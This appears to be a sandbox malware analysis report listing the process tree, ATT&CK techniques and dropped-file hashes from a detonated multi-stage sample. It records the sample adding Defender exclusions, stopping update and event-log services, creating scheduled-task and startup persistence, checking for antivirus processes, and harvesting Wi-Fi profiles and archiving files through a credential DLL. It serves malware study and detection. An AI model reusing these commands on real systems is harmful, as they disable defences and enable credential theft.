C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1220
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:3944
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:2064
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:6124
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵PID:2960
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵PID:2900
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵PID:1812
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵PID:5472
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:2336
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:5860
-
-
-
C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe"C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:2108 -
C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exeC:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x6c9a21c8,0x6c9a21d4,0x6c9a21e04⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6108
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z5Pwcmkmjtj7jGqzkWXixJVL.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z5Pwcmkmjtj7jGqzkWXixJVL.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3400
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"2⤵PID:5736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3908 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:31⤵PID:4156
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:536 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5348
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5620
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:5492
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:3832
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:5076
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5788
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:3912
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:1168
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:844
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:2712
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:508
-
-
C:\Windows\explorer.exeexplorer.exe2⤵PID:3008
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4688
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\85CB.bat" "1⤵PID:5788
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 12⤵PID:4060
-
-
C:\Users\Admin\AppData\Local\Temp\DD14.exeC:\Users\Admin\AppData\Local\Temp\DD14.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3404 -
C:\Users\Admin\AppData\Local\Temp\DD14.exeC:\Users\Admin\AppData\Local\Temp\DD14.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:2712 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\0e5d7f2d-6754-4be0-b473-73a35806b01c" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:336
-
-
C:\Users\Admin\AppData\Local\Temp\DD14.exe"C:\Users\Admin\AppData\Local\Temp\DD14.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5992 -
C:\Users\Admin\AppData\Local\Temp\DD14.exe"C:\Users\Admin\AppData\Local\Temp\DD14.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
PID:5392 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 5725⤵
- Program crash
PID:536
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5388 -ip 53881⤵PID:4564
-
C:\Users\Admin\AppData\Local\Temp\8F7.exeC:\Users\Admin\AppData\Local\Temp\8F7.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3352 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:2348
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5392 -ip 53921⤵PID:6052
-
C:\Users\Admin\AppData\Roaming\cwvffbiC:\Users\Admin\AppData\Roaming\cwvffbi1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5488
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5880
-
C:\Users\Admin\AppData\Local\Temp\B159.exeC:\Users\Admin\AppData\Local\Temp\B159.exe1⤵
- Executes dropped EXE
PID:5476
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B64C.bat" "1⤵PID:5524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 12⤵PID:5720
-
-
C:\Users\Admin\AppData\Local\Temp\EE16.exeC:\Users\Admin\AppData\Local\Temp\EE16.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3852 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe2⤵PID:4764
-
-
C:\Users\Admin\AppData\Local\Temp\7FD3.exeC:\Users\Admin\AppData\Local\Temp\7FD3.exe1⤵
- Executes dropped EXE
PID:3924 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe2⤵PID:5028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2064 -ip 20641⤵PID:436
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Executes dropped EXE
PID:6064 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Modifies data under HKEY_USERS
PID:3444
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:1092
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5700
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:5400
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:3112
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2364
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2072
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:4032
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:4024
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:3660
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:2172
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:2064
-
-
C:\Users\Admin\AppData\Local\Temp\58E.exeC:\Users\Admin\AppData\Local\Temp\58E.exe1⤵PID:5036
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Jeffrey Jeffrey.bat & Jeffrey.bat & exit2⤵PID:6008
-
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:3560
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"3⤵PID:4436
-
-
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:640
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"3⤵PID:4956
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 84843⤵PID:3760
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Sitemap + Sublimedirectory + Cow + Rss + Josh 8484\Http.pif3⤵PID:2444
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Cdt + Thumbnail + Powers + Tamil + Capabilities + Novel + Cos + Breach + Canal + Hobby + Debut + Patricia + Neural + Translations + Fist + Able + Warner + Shapes + Ancient + Plans + Greg + Go + Drain + Mpeg + Necessary + Robertson + Islam + Generations + Trim + Around + Companion + Maiden + Kills + Eat + Brunswick + Ww + Determines + Login + Heads + Wv + Vampire + Consequence + Tba 8484\F3⤵PID:3744
-
-
C:\Users\Admin\AppData\Local\Temp\8484\Http.pif8484\Http.pif 8484\F3⤵PID:1220
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.13⤵
- Runs ping.exe
PID:5700
-
-
-
C:\Users\Admin\AppData\Local\Temp\1510.exeC:\Users\Admin\AppData\Local\Temp\1510.exe1⤵PID:3040
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:5396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4132 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:81⤵PID:532
-
C:\Windows\SYSTEM32\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & echo URL="C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & exit1⤵PID:1808
-
C:\Windows\SYSTEM32\cmd.execmd /c schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F1⤵PID:4312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F2⤵
- DcRat
- Creates scheduled task(s)
PID:2420
-
-
C:\Users\Admin\AppData\Local\Temp\4E32.exeC:\Users\Admin\AppData\Local\Temp\4E32.exe1⤵PID:1752
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe2⤵PID:3268
-
-
C:\Users\Admin\AppData\Local\Temp\C95E.exeC:\Users\Admin\AppData\Local\Temp\C95E.exe1⤵PID:3280
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe"1⤵PID:1604
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x1000040,0x100004c,0x10000582⤵PID:3984
-
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:5480
-
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵PID:2420
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main2⤵PID:6032
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main3⤵PID:1268
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:5136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\808065738166_Desktop.zip' -CompressionLevel Optimal4⤵PID:4248
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main2⤵PID:2764
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4304
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4444
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:1712
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4256
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:4652
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4080
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:5580
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3944
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js"1⤵PID:4240
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:5448
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:6000
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:4844
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4468
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:2320
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3460
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:1392
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4164
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
2Disable or Modify System Firewall
1Modify Registry
3Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
92KB
MD54c2e2189b87f507edc2e72d7d55583a0
SHA11f06e340f76d41ea0d1e8560acd380a901b2a5bd
SHA25699a5f8dea08b5cf512ed888b3e533cc77c08dc644078793dc870abd8828c1bca
SHA5128b6b49e55afe8a697aaf71d975fab9e906143339827f75a57876a540d0d7b9e3cbbcdd8b5435d6198900a73895cc52d2082e66ee8cec342e72f2e427dde71600
-
Filesize
1.5MB
MD5aa590645e033ea8f8470a1b45ee309d5
SHA1b1fdc29f7f90edb21ae265f2a2f1b269d08c3423
SHA256378bbecf4372e7162b2c97e6331fb67a5c030e2d2976c5343a168f1d73cab216
SHA51225582d41b161917cdad4ba545602378351005e7df1d9f9857eaef6133c52695702dfbbd611818dc3877532b2a4607f69aa90e6aa8b08f13db9f3df49b0843b93
-
Filesize
220KB
MD5302e7bb88e0ca2e0a4b0fcb784f8e921
SHA179304b5359b5a5ffa222a48373d214ff7bdca8e9
SHA2560583a074f22df06e2e66267c0cd1789e77849b6e7efaf9409baf814e95374f7b
SHA512b15a5c71ba415d794690d49ba1585866a88e3d437c95c5e78f057a22108c6018441df3ee4a66b05133999fb42a043423317792f785ac2d42c8a73bee33c805b6
-
Filesize
2.6MB
MD53d233051324a244029b80824692b2ad4
SHA1a053ebdacbd5db447c35df6c4c1686920593ef96
SHA256fbd467ce72bca00eea3aaa6f32abc8aca1a734030d082458e21e1fe91e6a8d84
SHA5127f19c6400ac46556a9441844242b1acb0b2f11a47f5d51f6d092406a8c759a6d78c578bb5b15035e7cd1cdb3035acf0db884708b0da1a83eb652a50a68e3a949
-
Filesize
693KB
MD574969bd8528b1b57ffca52e0bc7b3b54
SHA1ecc0a25b31ba6c60c1125693a027bc9cb401c707
SHA25603552373b313b775ae58f0c3cc4bdc9e4fa640ad0763c58188b761d1395a8bc2
SHA512608a98eb531e417b99f5cfc6069ca5220b6ffe2624ca7b3c2e2c379a2595716b55f08906f3a6289ff4a485bfcd72def5cf4ae8ca58aa84e2b483fa48c1b38006
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
1.2MB
MD50b4b6144c0d7281a4d2e34e44199d0c5
SHA109c4e8d1a63e301444d01223ffc6d2b1a86173b3
SHA25647dc2d1974e63e35b98b757796e6ff73eacafd5ccf9cb77ec09ed6911c45ad4b
SHA5127c8ba0af622290dde8cec2a958764b17864bcdc92fcee8820dbaac9cf271d6bb46dc0a350c67f09f9fe37ad45362c72f6d339e6683f5f7abf361c4a6be90db81
-
Filesize
1.1MB
MD5ddf5fe475916a430fb18941d19c89211
SHA1d31eebd92782de2e18be0c0a2d022a78ca4e74be
SHA2566e69754e03ca086758cd9c99afc004ca90d50b47e695addadaee64020311c8e9
SHA5125f853ffb1ca02b5224223d85c83acb4f1ff05065e2854b601cd8c72ba5912786d4980a48e0c82676b51a75a922b6441a34c11209c70b9d95c347d28982ba0386
-
Filesize
984KB
MD581de79f779f7485a323903718d959374
SHA13baee3a8ea2d1451064c00ef2fdad79404a2565d
SHA256deca6bfd0957e2ee8d1dbb08e545a20d63e0cdb691873aa42ebbaa70c0c0f61b
SHA512dc5dbb1ca1e643d7880a7257293bf834f1e0c00cad08d6d2aa66fbd68826d5a92f8ac3326f128f0be194141b12932740368dd9c415f1384ca7745310ed4a6703
-
Filesize
122KB
MD56231b452e676ade27ca0ceb3a3cf874a
SHA1f8236dbf9fa3b2835bbb5a8d08dab3a155f310d1
SHA2569941eee1cafffad854ab2dfd49bf6e57b181efeb4e2d731ba7a28f5ab27e91cf
SHA512f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c
-
Filesize
1KB
MD547b22c695811b64b1c8ff3933f9ea6da
SHA1546e84c0f5b0062701a52f7fa7c22db48cc73cfd
SHA256a560208d6f4bc9b797926c8621f3657071918c88389c31e5a8a8851bb77bac07
SHA512a5342e8b3be45e1487f3356827796852c51c783d262ecebed6636402f38c40786027d10f9979135dda528ccb6e6d4931f92177a1c9e0d91da37919034268ac40
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\additional_file0.tmp
Filesize2.5MB
MD520d293b9bf23403179ca48086ba88867
SHA1dedf311108f607a387d486d812514a2defbd1b9e
SHA256fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348
SHA5125d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
Filesize622KB
MD510ab819cc1fd05db944a461213acf560
SHA1c2e41cb4d74e28351437f7a879bea3355c210ebf
SHA256ea86bedcce197838b0817719f395b9fdc978d4b07be79703e2e0aae11212dd8e
SHA51267ec7a885445de734e96545fc1646b6a86727c1d62ebde530ff3e1f0fe7d0afa5b9ca27d1b293f26f802358052bf46ad2815084c763d8678bd05148ac2d46512
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
Filesize192KB
MD57b1d5aaede95bc464a6bc0494c0ffe07
SHA18f1147308a389eb9aded7aec9eba9cbce2e25839
SHA256193d24c87e4f2c8ef05ae9b3b9c4e10248b9add7a38f228b4c6ebcf161bcb40c
SHA5124ff9827818a7ac021383293dfb061ad0a6a5430ea38908c1a7243f06ae5c530a34fb5d2c69ff15ed23eadd62d27a5a6627a8549d9f1a09585d5ea8b53753d1d8
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbgcore.dll
Filesize51KB
MD5e06f8bf58534ef7c5124c4f78e7a07dd
SHA1c9d2e9f84318de88cd94e12d8a8635ff248b7190
SHA2560fc30d71b17cb17dab1088cb80aff056f64e59fa2c3f2b54d384bd8be34cba06
SHA512f822eb539e027dc508142cf6188b6bff1fa098bd2dd7811fb9ed90031f3d2ecf56cdcef753e2563d06889a01c0a172c929826e59a2891676361558939315bccd
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbgcore.dll
Filesize166KB
MD58b6f64e5d3a608b434079e50a1277913
SHA103f431fabf1c99a48b449099455c1575893d9f32
SHA256926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2
